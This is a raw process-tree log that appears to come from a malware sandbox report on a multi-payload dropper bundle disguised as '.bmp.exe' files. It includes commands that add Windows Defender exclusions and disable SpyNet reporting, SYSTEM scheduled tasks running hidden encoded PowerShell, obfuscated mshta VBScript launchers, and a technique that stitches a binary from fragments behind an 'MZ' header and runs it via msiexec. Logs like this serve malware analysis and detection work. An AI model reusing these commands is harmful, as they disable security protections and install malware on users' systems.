C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 8249⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 10129⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 10489⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 13769⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "mixinte.bmp.exe" /f10⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 13249⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS9B07.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSAD86.tmp\Install.exe.\Install.exe /S /site_id "525403"10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRkHuUFMR" /SC once /ST 03:10:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRkHuUFMR"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRkHuUFMR"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKqtUhAckstRmOkXqo" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GDRPYdOHWOMIRVQbw\bnDAWlqtvsqsVUM\FlNSNPI.exe\" hO /site_id 525403 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Camminato.xla & ping -n 5 localhost9⤵
-
C:\Windows\SysWOW64\cmd.execmd10⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"11⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"11⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^XufIWpJvRqjcIeFiHQtYxsuHNiySwUYnVemDyijdsqGlBBEcpYOSjQXFZIVPtQcWeNAGDwwADOHxLWykDKJryujytTDvkbkAEJiOwYSo$" Nemica.xla11⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Plasmare.exe.pifPlasmare.exe.pif J11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 511⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\TapiUnattend.exeTapiUnattend9⤵
-
C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"8⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",10⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",12⤵
-
C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0SGIH.tmp\B2BCH2.exe.tmp"C:\Users\Admin\AppData\Local\Temp\is-0SGIH.tmp\B2BCH2.exe.tmp" /SL5="$60236,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4HPRI.tmp\djkdj778_______.exe"C:\Users\Admin\AppData\Local\Temp\is-4HPRI.tmp\djkdj778_______.exe" /S /UID=9110⤵
-
C:\Program Files\Windows Multimedia Platform\SQBZJPAESH\poweroff.exe"C:\Program Files\Windows Multimedia Platform\SQBZJPAESH\poweroff.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A6684.tmp\poweroff.tmp"C:\Users\Admin\AppData\Local\Temp\is-A6684.tmp\poweroff.tmp" /SL5="$4047E,490199,350720,C:\Program Files\Windows Multimedia Platform\SQBZJPAESH\poweroff.exe" /VERYSILENT12⤵
-
C:\Program Files (x86)\powerOff\Power Off.exe"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu13⤵
-
C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe" -hq7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe"6⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\Ygvpfvtkjpbhrqwcbakelpadportable_4_9_82.exe"C:\Users\Admin\AppData\Local\Temp\Ygvpfvtkjpbhrqwcbakelpadportable_4_9_82.exe"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe8⤵
-
C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"6⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",8⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",10⤵
-
C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 15327⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 4567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 7647⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 7727⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 7927⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 8047⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 9847⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 10127⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 13727⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mixruzki1.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mixruzki1.bmp.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 14887⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"6⤵
-
C:\Program Files (x86)\Installoid\installoid.exe"C:\Program Files (x86)\Installoid\installoid.exe"7⤵
-
C:\Windows\system32\cmd.exe/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'9⤵
-
C:\Windows\system32\cmd.exe/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'8⤵
-
C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\AppData\Local\Temp\DA2KD610K7C5090.exe
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\C2JAI2314AAAKHL.exe
-
C:\Users\Admin\AppData\Local\Temp\54HJAC1DI38KD56.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed189277fa467071b4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exeWed189277fa467071b4.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exeC:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exeC:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed18b39e5016b09c0.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b39e5016b09c0.exeWed18b39e5016b09c0.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed18bc651a8ec.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18bc651a8ec.exeWed18bc651a8ec.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed183acbd9650c5ba88.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exeWed183acbd9650c5ba88.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIpT: CloSE( CrEATeobjeCt ( "wScRIpT.SHeLL" ). Run ("cMD.EXE /r cOpy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exe"" ..\VIeEVfFWG.eXE && StArT ..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF & iF """" == """" for %O iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exe"" ) do taskkill /f -Im ""%~NXO"" " ,0 , tRUe ) )6⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r cOpy /Y "C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exe" ..\VIeEVfFWG.eXE && StArT ..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF & iF ""== "" for %O iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exe" ) do taskkill /f -Im "%~NXO"7⤵
-
C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIpT: CloSE( CrEATeobjeCt ( "wScRIpT.SHeLL" ). Run ("cMD.EXE /r cOpy /Y ""C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE"" ..\VIeEVfFWG.eXE && StArT ..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF & iF ""/Pn~NEdj1Yvwq4Z5P9cDcAtnF "" == """" for %O iN ( ""C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE"" ) do taskkill /f -Im ""%~NXO"" " ,0 , tRUe ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r cOpy /Y "C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE" ..\VIeEVfFWG.eXE && StArT ..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF & iF "/Pn~NEdj1Yvwq4Z5P9cDcAtnF "== "" for %O iN ( "C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE" ) do taskkill /f -Im "%~NXO"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScript: CLoSe(CrEaTEObJeCt ( "wscriPT.shELL" ).ruN ("C:\Windows\system32\cmd.exe /q /R ECho | sET /P = ""MZ"" >_3C2lN.C30 & coPY /B /Y _3C2LN.C30 +G3GZ.J~ + L6PlIZD.LO + KKjk_39e._P + UK4KLvfF.YHX +MHXm.C +T7Y700Y.bI ..\KOoD.6SV & dEl /q *& StART msiexec -Y ..\kOoD.6Sv " , 0 , trUe ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /R ECho | sET /P = "MZ" >_3C2lN.C30 & coPY /B /Y _3C2LN.C30+G3GZ.J~+ L6PlIZD.LO + KKjk_39e._P+ UK4KLvfF.YHX +MHXm.C+T7Y700Y.bI ..\KOoD.6SV & dEl /q *& StART msiexec -Y ..\kOoD.6Sv10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>_3C2lN.C30"11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\kOoD.6Sv11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "Wed183acbd9650c5ba88.exe"8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed189a2b3ffdf4e59.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exeWed189a2b3ffdf4e59.exe5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "" == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exe" ) do taskkill /Im "%~Nxs" -f7⤵
-
C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF ""-pVmK5OY1Q2FwiV3_NJROp~tX8k "" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "-pVmK5OY1Q2FwiV3_NJROp~tX8k " == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ) do taskkill /Im "%~Nxs" -f10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpt: closE ( crEateOBjECT ("WsCRipT.sHELl" ).ruN( "cmD.Exe /r EchO | SEt /P = ""MZ"" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB + V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q * " ,0 , TRUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r EchO | SEt /P = "MZ" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB+ V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q *10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>OoZ39QP7.Q~P"11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EchO "11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y ..\WgKZNZ9T.JOX11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "Wed189a2b3ffdf4e59.exe" -f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed18b44c8630.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exeWed18b44c8630.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-NQT9E.tmp\Wed18b44c8630.tmp"C:\Users\Admin\AppData\Local\Temp\is-NQT9E.tmp\Wed18b44c8630.tmp" /SL5="$50058,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exe"C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exe" /SILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-NLCQ4.tmp\Wed18b44c8630.tmp"C:\Users\Admin\AppData\Local\Temp\is-NLCQ4.tmp\Wed18b44c8630.tmp" /SL5="$60058,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed180cd523402090.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed180cd523402090.exeWed180cd523402090.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed182283564f1d8.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed182283564f1d8.exeWed182283564f1d8.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 6246⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 6286⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 6726⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 8126⤵
- Executes dropped EXE
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 8406⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 8886⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 10526⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 10606⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 13646⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed18d14c752adf99.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1811682666.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed18e6324bbde126d.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed18be8c3224a5.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed186a2b91bd4e9.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed18d947df9c44e3.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 6284⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18d947df9c44e3.exeWed18d947df9c44e3.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18e6324bbde126d.exeWed18e6324bbde126d.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18e6324bbde126d.exeC:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18e6324bbde126d.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18d14c752adf99.exeWed18d14c752adf99.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"2⤵
-
